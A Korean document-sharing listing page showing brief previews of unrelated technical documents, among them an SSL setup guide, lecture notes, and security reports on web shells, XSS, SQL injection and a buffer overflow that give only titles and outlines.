1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

SBR-100S User Manual

SBR-100S User Manual ( 1 / 13 ) SBR-100S 모델에 대한 사용자 펌웨어 업그레이드 방법을 안내해 드립니다. SBR-100S 는 신규 펌웨어가 있을시 FOTA(자동업데이트) 기능을 통하여 자동 업그레이드가 되며, 필요시 사용자가 신규 펌웨어를 다운받아 수동으로 업그레이드 할 수 있습니다. 1. 준비하기 1.1 연결 장치 준비 펌웨어 업그레이드를 위해서는 SBR-100S

More information

<5BB5BFB8EDB4EB2D E4B5D C0A5BDA9C0C720BAD0BCAEB0FA20B4EBC0C020B9E6BEC82E687770>

<5BB5BFB8EDB4EB2D E4B5D C0A5BDA9C0C720BAD0BCAEB0FA20B4EBC0C020B9E6BEC82E687770> 기술문서 08. 10. 25. 작성 PHP 기반웹쉘의동작원리와공개웹쉘의기능분석및대응방안 작성자 : 동명대학교 THINK 정정홍 (zeratul621@naver.com) 1. 시작하면서 p. 2 2. 웹쉘의동작원리 p. 3 3. r57shell p. 5 4. kcwebtelnet p. 9 5. phpremoteview p. 10 6. 웹쉘대응방안 p. 12 동명대학교정보보호동아리

More information

var answer = confirm(" 확인이나취소를누르세요."); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write(" 확인을눌렀습니다."); else { document.write(" 취소를눌렀습니다.");

var answer = confirm( 확인이나취소를누르세요.); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write( 확인을눌렀습니다.); else { document.write( 취소를눌렀습니다.); 자바스크립트 (JavaScript) - HTML 은사용자에게인터페이스 (interface) 를제공하는언어 - 자바스크립트는서버로데이터를전송하지않고서할수있는데이터처리를수행한다. - 자바스크립트는 HTML 나 JSP 에서작성할수있고 ( 내부스크립트 ), 별도의파일로도작성이가능하다 ( 외 부스크립트 ). - 내부스크립트 - 외부스크립트

More information

로거 자료실

로거 자료실 redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...

More information

Microsoft PowerPoint - aj-lecture1.ppt [호환 모드]

Microsoft PowerPoint - aj-lecture1.ppt [호환 모드] 인터넷과웹서비스 개발환경구성, JSP 기본구조 인터넷과 WWW(World Wide Web) 인터넷은 TCP/IP 기반의네트워크가전세계적으로확대되어하나로연결된 네트워크의네트워크 WWW(World Wide Web) 는인터넷기반의서비스중하나 이름프로토콜포트기능 WWW http 80 웹서비스 524730-1 2019 년봄학기 3/11/2019 박경신 Email SMTP/POP3/IMAP

More information

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환 취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple

More information

untitled

untitled 디렉토리리스팅취약점을이용한게임 DB 서버해킹사고 2006. 8. 3 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요중국발해킹의표적이온라인게임서버에까지이어지고있다. 특히중국에는현재수많은게임작업장이있으며, 이곳에서는많은중국인들이단순히게임을즐기는것이아니라아이템매매로인한금전적인이득을목적으로한범죄행위를하고있다.

More information

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여

More information

2009년 상반기 사업계획

2009년 상반기 사업계획 웹 (WWW) 쉽게배우는데이터통신과컴퓨터네트워크 학습목표 웹서비스를위한클라이언트 - 서버구조를살펴본다. 웹서비스를지원하는 APM(Apache, PHP, MySQL) 의연동방식을이해한다. HTML 이지원하는기본태그명령어와프레임구조를이해한다. HTTP 의요청 / 응답메시지의구조와동작원리를이해한다. CGI 의원리를이해하고 FORM 태그로사용자입력을처리하는방식을알아본다.

More information

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc 분석보고서 이동현 (dhclub20@naver.com) SK Infosec Co., Inc MSS 사업본부침해대응팀모의해킹파트 Table of Contents 1. 개요... 3 1.1. 배경... 3 1.2. 목적... 3 2. 공격분석... 4 2.1. Cookie Injection... 4 2.2. Cookie Injection의발생원인... 5 2.3.

More information

설명 Description 상세정보 네이버에서운영하는서비스중하나인쥬니어네이버 ( 이하쥬니버 ) 에서는쥬니버서비스와 관련하여도움을주기위한 [ 그림 1] 과같은플래시애플리케이션이서비스되고있다.[2] [ 그림 1] 쥬니어네이버에서서비스중인쥬니버도우미플래시애플리케이션 해당플래

설명 Description 상세정보 네이버에서운영하는서비스중하나인쥬니어네이버 ( 이하쥬니버 ) 에서는쥬니버서비스와 관련하여도움을주기위한 [ 그림 1] 과같은플래시애플리케이션이서비스되고있다.[2] [ 그림 1] 쥬니어네이버에서서비스중인쥬니버도우미플래시애플리케이션 해당플래 네이버플래시애플리케이션 XSS 취약점분석보고서 작성일 2013/04/24 작성자 카이스트시스템보안연구실 홍현욱 (karmatia@kaist.ac.kr) 최현우 (zemisolsol@kaist.ac.kr) 김용대 (yongdaek@kaist.ac.kr) 요약 플래시애플리케이션은보고서작성일을기준으로전체웹사이트의 19.5% 가사용하고있으며 [5] 이러한플래시애플리케이션을작동시켜주는플래시플레이어는웹브라우저에기본적으로설치되어있거나웹브라우저에서웹사이트를이용하는사용자들에게자동으로설치하도록유도한다.

More information

<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F32C2F7BDC32E >

<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F32C2F7BDC32E > 6. ASP.NET ASP.NET 소개 ASP.NET 페이지및응용프로그램구조 Server Controls 데이터베이스와연동 8 장. 데이터베이스응용개발 (Page 20) 6.1 ASP.NET 소개 ASP.NET 동적웹응용프로그램을개발하기위한 MS 의웹기술 현재 ASP.NET 4.5까지출시.Net Framework 4.5 에포함 Visual Studio 2012

More information

Cloud Friendly System Architecture

Cloud Friendly System Architecture -Service Clients Administrator 1. -Service 구성도 : ( 좌측참고 ) LB(LoadBlancer) 2. -Service 개요 ucloud Virtual Router F/W Monitoring 개념 특징 적용가능분야 Server, WAS, DB 로구성되어 web service 를클라우드환경에서제공하기위한 service architecture

More information

*2008년1월호진짜

*2008년1월호진짜 3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가

More information

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우. 소프트웨어매뉴얼 윈도우드라이버 Rev. 3.03 SLP-TX220 / TX223 SLP-TX420 / TX423 SLP-TX400 / TX403 SLP-DX220 / DX223 SLP-DX420 / DX423 SLP-DL410 / DL413 SLP-T400 / T403 SLP-T400R / T403R SLP-D220 / D223 SLP-D420 / D423

More information

Microsoft PowerPoint 웹 연동 기술.pptx

Microsoft PowerPoint 웹 연동 기술.pptx 웹프로그래밍및실습 ( g & Practice) 문양세강원대학교 IT 대학컴퓨터과학전공 URL 분석 (1/2) URL (Uniform Resource Locator) 프로토콜, 호스트, 포트, 경로, 비밀번호, User 등의정보를포함 예. http://kim:3759@www.hostname.com:80/doc/index.html URL 을속성별로분리하고자할경우

More information

0. 들어가기 전

0. 들어가기 전 컴퓨터네트워크 14 장. 웹 (WWW) (3) - HTTP 1 이번시간의학습목표 HTTP 의요청 / 응답메시지의구조와동작원리이해 2 요청과응답 (1) HTTP (HyperText Transfer Protocol) 웹브라우저는 URL 을이용원하는자원표현 HTTP 메소드 (method) 를이용하여데이터를요청 (GET) 하거나, 회신 (POST) 요청과응답 요청

More information

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자 SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전

More information

Microsoft Word - CrossSiteScripting[XSS].docx

Microsoft Word - CrossSiteScripting[XSS].docx 1 Education Giehong.E goodbyestar@nate.com abstract - 영리를목적으로한곳에서의불법적인배포는금지합니다. - 문서의내용은임의의가상테스트를대상으로한 OWASP10 의기본적인내용들이며교육을위해만들어진문서입니다. - 비인가받은악의적인행동은불법이며법적책임또한당사자에게있습니다 Copyright@2008 All Rights Reserved

More information

BEA_WebLogic.hwp

BEA_WebLogic.hwp BEA WebLogic Server SSL 설정방법 - Ver 1.0-2008. 6 개정이력 버전개정일개정내용 Ver 1.0 2008 년 6 월 BEA WebLogic Server SSL 설명서최초작성 본문서는정보통신부 한국정보보호진흥원의 보안서버구축가이드 를참고하여작성되었습니다. 본문서내용의무단도용및사용을금합니다. < 목차 > 1. 개인키및 CSR 생성방법

More information

<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770> 네트워크 장비의 디폴트 로그인 패스워드 취약점 및 대책 2005. 11. 30 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]룰 명시하여 주시기 바랍니다. - 1 - 1. 개요 패스워드 관리는 보안의 가장 기본적인 사항으로 유추하기 어려운 패스워드를 사용하고, 주기적 으로 패스워드를 변경하는 등 패스워드 관리에 신경을 많이 쓰고

More information

TTA Journal No.157_서체변경.indd

TTA Journal No.157_서체변경.indd 표준 시험인증 기술 동향 FIDO(Fast IDentity Online) 생체 인증 기술 표준화 동향 이동기 TTA 모바일응용서비스 프로젝트그룹(PG910) 의장 SK텔레콤 NIC 담당 매니저 76 l 2015 01/02 PASSWORDLESS EXPERIENCE (UAF standards) ONLINE AUTH REQUEST LOCAL DEVICE AUTH

More information

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770> 개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000

More information

Microsoft PowerPoint - 07-EDU-Apache-9-1.ppt

Microsoft PowerPoint - 07-EDU-Apache-9-1.ppt 1 아파치, HTTP, APM 소개 APM 설치하기 순천향대학교컴퓨터학부이상정 1 아파치, HTTP, APM 소개 순천향대학교컴퓨터학부이상정 2 소개 정식명칭 : Apache HTTP server 관련홈페이지 : www.apache.org GNU GPL 라이센스를통해무료로배포되는소프트웨어 현재 50% 이상의웹서버소프트웨어시장점유율 안정적으로동작 www.amazon.com이나

More information

제목 레이아웃

제목 레이아웃 웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya

More information

Install stm32cubemx and st-link utility

Install stm32cubemx and st-link utility STM32CubeMX and ST-LINK Utility for STM32 Development 본문서는 ST Microelectronics 의 ARM Cortex-M 시리즈 Microcontroller 개발을위해제공되는 STM32CubeMX 와 STM32 ST-LINK Utility 프로그램의설치과정을설명합니다. 본문서는 Microsoft Windows 7

More information

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770> 웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.

More information

PowerPoint Presentation

PowerPoint Presentation WordPress 를이용한웹사이트만들기 2015 년 한지웅 WordPress 를이용한웹사이트만들기 Day 1 Day 2 Day 3 Day 4 Day 5 1. 웹사이트제작기초 HTLM 기본 CSS 기본 WordPress 개론 ( 웹사이트구축툴 ) 2. 웹호스팅 / 웹사이트구축 웹호스팅업체선택 cpanel 설정 WordPress 설치 3. WordPress 기초활용

More information

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 해킹의 종류 웹해킹 네트워크 해킹 시스템(OS)해킹 웹해킹 기법 SQL INJECTION HTML INJECTION Cross Site Scripting HEADER INJECTION 웹해킹 기법 업로드 취약점 다운로드 취약점 INJECTION 나는 사람입니다. 나는

More information

#WI DNS DDoS 공격악성코드분석

#WI DNS DDoS 공격악성코드분석 #WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음

More information

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 Eclipse (IDE) JDK Android SDK with ADT IDE: Integrated Development Environment JDK: Java Development Kit (Java SDK) ADT: Android Development Tools 2 JDK 설치 Eclipse

More information

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아 LG U+ SMS/MMS 통합클라이언트 LG U+ SMS/MMS Client Simple Install Manual LG U+ SMS/MMS 통합클라이언트 - 1 - 간단설치매뉴얼 1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml

More information

AhnLab_template

AhnLab_template 해킹과침해대응 웹해킹과대응 2013. 10. 17 ( 목 ) 안랩 ASEC 대응팀문영조 Contents 01 웹해킹과취약점 02 웹해킹기법에대한이해 03 웹해킹과침해대응 04 결론 01 웹해킹과취약점 개요 01. 웹해킹과취약점 < 출처 - IBM X-Force 2012 Annual Trend & Risk Report> 4 개요 01. 웹해킹과취약점 웹해킹 (Web

More information

<4D6963726F736F667420506F776572506F696E74202D2030342E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA2831292E70707478>

<4D6963726F736F667420506F776572506F696E74202D2030342E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA2831292E70707478> 웹과 인터넷 활용 및실습 () (Part I) 문양세 강원대학교 IT대학 컴퓨터과학전공 강의 내용 전자우편(e-mail) 인스턴트 메신저(instant messenger) FTP (file transfer protocol) WWW (world wide web) 인터넷 검색 홈네트워크 (home network) Web 2.0 개인 미니홈페이지 블로그 (blog)

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 HTML5 웹프로그래밍입문 부록. 웹서버구축하기 1 목차 A.1 웹서버시스템 A.2 PHP 사용하기 A.3 데이터베이스연결하기 2 A.1 웹서버시스템 3 웹서버의구축 웹서버컴퓨터구축 웹서버소프트웨어설치및실행 아파치 (Apache) 웹서버가대표적 서버실행프로그램 HTML5 폼을전달받아처리 PHP, JSP, Python 등 데이터베이스시스템 서버측에데이터를저장및효율적관리

More information

Endpoint Protector - Active Directory Deployment Guide

Endpoint Protector - Active Directory Deployment Guide Version 1.0.0.1 Active Directory 배포가이드 I Endpoint Protector Active Directory Deployment Guide 목차 1. 소개...1 2. WMI 필터생성... 2 3. EPP 배포 GPO 생성... 9 4. 각각의 GPO 에해당하는 WMI 연결... 12 5.OU 에 GPO 연결... 14 6. 중요공지사항

More information

System Recovery 사용자 매뉴얼

System Recovery 사용자 매뉴얼 Samsung OS Recovery Solution 을이용하여간편하게 MagicInfo 의네트워크를설정하고시스템을백업및복원할수있습니다. 시스템시작시리모컨의 - 버튼이나키보드의 F3 키를연속해서누르면복구모드로진입한후 Samsung OS Recovery Solution 이실행됩니다. Samsung OS Recovery Solution 은키보드와리모컨을사용하여조작할수있습니다.

More information

1

1 2/33 3/33 4/33 5/33 6/33 7/33 8/33 9/33 10/33 11/33 12/33 13/33 14/33 15/33 16/33 17/33 5) 입력을 다 했으면 확인 버튼을 클릭합니다. 6) 시작 페이지가 제대로 설정이 되었는지 살펴볼까요. 익스플로러를 종료하고 다시 실행시켜 보세요. 시작화면에 야후! 코리아 화면이 뜬다면 설정 완료..^^

More information

행자부 G4C

행자부 G4C 인증서발급관리모듈 Ver 1.0 개정이력 버전변경일변경사유변경내용작성자승인 1.0 2012-12-22 제정이경희 Copyright 2006. All rights reserved DreamSecurity. 2 목차 1. 인증시스템 ACTIVEX 설치절차... 4 1.1 설치... 4 2. 인증시스템 ACTIVEX 사용... 7 2.1 인증서발급... 7 2.2

More information

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments

More information

Studuino소프트웨어 설치

Studuino소프트웨어 설치 Studuino 프로그래밍환경 Studuino 소프트웨어설치 본자료는 Studuino 프로그래밍환경설치안내서입니다. Studuino 프로그래밍 환경의갱신에따라추가 / 수정될수있습니다. 목차 1. 소개... 1 2. Windows... 2 2.1. 프로그래밍환경설치... 2 2.1.1. 웹설치버전설치방법... 2 2.2. Studuino 프로그래밍환경실행...

More information

DBMS & SQL Server Installation Database Laboratory

DBMS & SQL Server Installation Database Laboratory DBMS & 조교 _ 최윤영 } 데이터베이스연구실 (1314 호 ) } 문의사항은 cyy@hallym.ac.kr } 과제제출은 dbcyy1@gmail.com } 수업공지사항및자료는모두홈페이지에서확인 } dblab.hallym.ac.kr } 홈페이지 ID: 학번 } 홈페이지 PW:s123 2 차례 } } 설치전점검사항 } 설치단계별설명 3 Hallym Univ.

More information

Cookie Spoofing.hwp

Cookie Spoofing.hwp Cookie Spoofing&Sniffing By Maxoverpro[max]( 장상근) maxoverpro@empal.com http://www.maxoverpro.org 1. 서론 이문서는 Cookie Spoofing 과 Sniffing 에대해정석적인방법을이야기하도록하며또 한어느특정곳의취약점을설명하지않고직접제작한예제를가지고 Cookie Spoofing 과

More information

리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2.

리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2. 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2. 3Rabbitz Book 애플리케이션파일다운로드하여압축파일을풀고복사합니다. 3. 3Rabbitz Book 실행합니다.

More information

WAS 의동작과 WEB, Servlet, JSP 엑셈컨설팅본부 /APM 박종현 웹어플리케이션서버란? 웹어플리케이션서버방식은웹서버가직접어플리케이션프로그램을처리하는것이아니라웹어플리케이션서버에게처리를넘겨주고어플리케이션서버가어플리케이션프로그램을처리한다. 여러명의사용자가동일한페

WAS 의동작과 WEB, Servlet, JSP 엑셈컨설팅본부 /APM 박종현 웹어플리케이션서버란? 웹어플리케이션서버방식은웹서버가직접어플리케이션프로그램을처리하는것이아니라웹어플리케이션서버에게처리를넘겨주고어플리케이션서버가어플리케이션프로그램을처리한다. 여러명의사용자가동일한페 WAS 의동작과 WEB, Servlet, JSP 엑셈컨설팅본부 /APM 박종현 웹어플리케이션서버란? 웹어플리케이션서버방식은웹서버가직접어플리케이션프로그램을처리하는것이아니라웹어플리케이션서버에게처리를넘겨주고어플리케이션서버가어플리케이션프로그램을처리한다. 여러명의사용자가동일한페이지를요청하여여러어플리케이션프로그램을처리할때오직한개의프로세스만을할당하고사용자의요청을 thread

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 워드프레스소개및운용관리안내 1 목차 2 1. 워드프레스소개 역사 2003 년매트물렌웨그에의해탄생 ver0.7 플러그인구조, 애플리케이션프로그램밍인터페이스도입 테마구조와페이지운영이가능한 ver1.5 로테마변경및디자인에대한자유도부여 Wyswyg 방식의문서편집기도입 MU(multi-user) 개념의도입 Social 쉐어플러그인도입으로 (SNS 연계 ) 현재워드프레스

More information

01장 웹 개요와 실습 환경 구축

01장 웹 개요와 실습 환경 구축 01 장 웹개요와실습환경구축 목차 1. 인터넷과웹소개 2. 웹의동작원리 3. 보조웹표준기술소개 4. HTML5 주요기능소개 5. 실습환경구축 학습목표 1. 웹의개념과특징을이해한다. 2. 웹의동작원리를이해한다. 3. 대표적인웹표준기술의특징을이해한다. HTML5, CSS3, 자바스크립트 4. 웹프로그래밍을위한개발환경을구축한다. 1. 인터넷과웹소개 인터넷 (Internet)

More information

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Outline Network Network 구조 Source-to-Destination 간 packet 전달과정 Packet Capturing Packet Capture 의원리 Data Link Layer 의동작 Wired LAN Environment

More information

tiawPlot ac 사용방법

tiawPlot ac 사용방법 tiawplot ac 매뉴얼 BORISOFT www.borisoft.co.kr park.ji@borisoft.co.kr HP : 00-370-077 Chapter 프로그램설치. 프로그램설치 3 2 Chapter tiawplot ac 사용하기.tiawPlot ac 소개 2.tiawPlot ac 실행하기 3. 도면파일등록및삭제 4. 출력장치설정 5. 출력옵션설정

More information

gcloud storage 사용자가이드 1 / 17

gcloud storage 사용자가이드 1 / 17 gcloud storage 사용자가이드 1 / 17 문서버전및이력 버전 일자 이력사항 1.0 2016.12.30 신규작성 1.1 2017.01.19 gcloud storage 소개업데이트 1.2 2017.03.17 Container 공개설정업데이트 1.3 2017.06.28 CDN 서비스연동추가 2 / 17 목차 1. GCLOUD STORAGE 소개... 4

More information

ISP and CodeVisionAVR C Compiler.hwp

ISP and CodeVisionAVR C Compiler.hwp USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler http://www.avrmall.com/ November 12, 2007 Copyright (c) 2003-2008 All Rights Reserved. USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi

More information

<4D F736F F F696E74202D E20B3D7C6AEBFF6C5A920C7C1B7CEB1D7B7A1B9D62E >

<4D F736F F F696E74202D E20B3D7C6AEBFF6C5A920C7C1B7CEB1D7B7A1B9D62E > 웹프로그래밍및실습 ( g & Practice) 문양세강원대학교 IT 대학컴퓨터과학전공 소켓 (Socket) (1/2) Socket 이란? 서버와클라이언트가서로특정한규약을사용하여데이터를전송하기위한방식 서버와클라이언트는소켓연결을기다렸다가소켓이연결되면서로데이터를전송 현재네트워크상에서의모든통신의근간은 Socket 이라할수있음 Page 2 1 소켓 (Socket) (2/2)

More information

6강.hwp

6강.hwp ----------------6강 정보통신과 인터넷(1)------------- **주요 키워드 ** (1) 인터넷 서비스 (2) 도메인네임, IP 주소 (3) 인터넷 익스플로러 (4) 정보검색 (5) 인터넷 용어 (1) 인터넷 서비스******************************* [08/4][08/2] 1. 다음 중 인터넷 서비스에 대한 설명으로

More information

<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F31C2F7BDC32E >

<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F31C2F7BDC32E > Chapter 8 데이터베이스응용개발 목차 사용자인터페이스와도구들 웹인터페이스와데이터베이스 웹기초 Servlet 과 JSP 대규모웹응용개발 ASP.Net 8 장. 데이터베이스응용개발 (Page 1) 1. 사용자인터페이스와도구들 대부분의데이터베이스사용자들은 SQL을사용하지않음 응용프로그램 : 사용자와데이터베이스를연결 데이터베이스응용의구조 Front-end Middle

More information

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월 메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. qmail, SPF 인증모듈설치

More information

<32355FC8A8C6E4C0CCC1F620B1B8C3E020BAB8BEC820B0A1C0CCB5E52E687770>

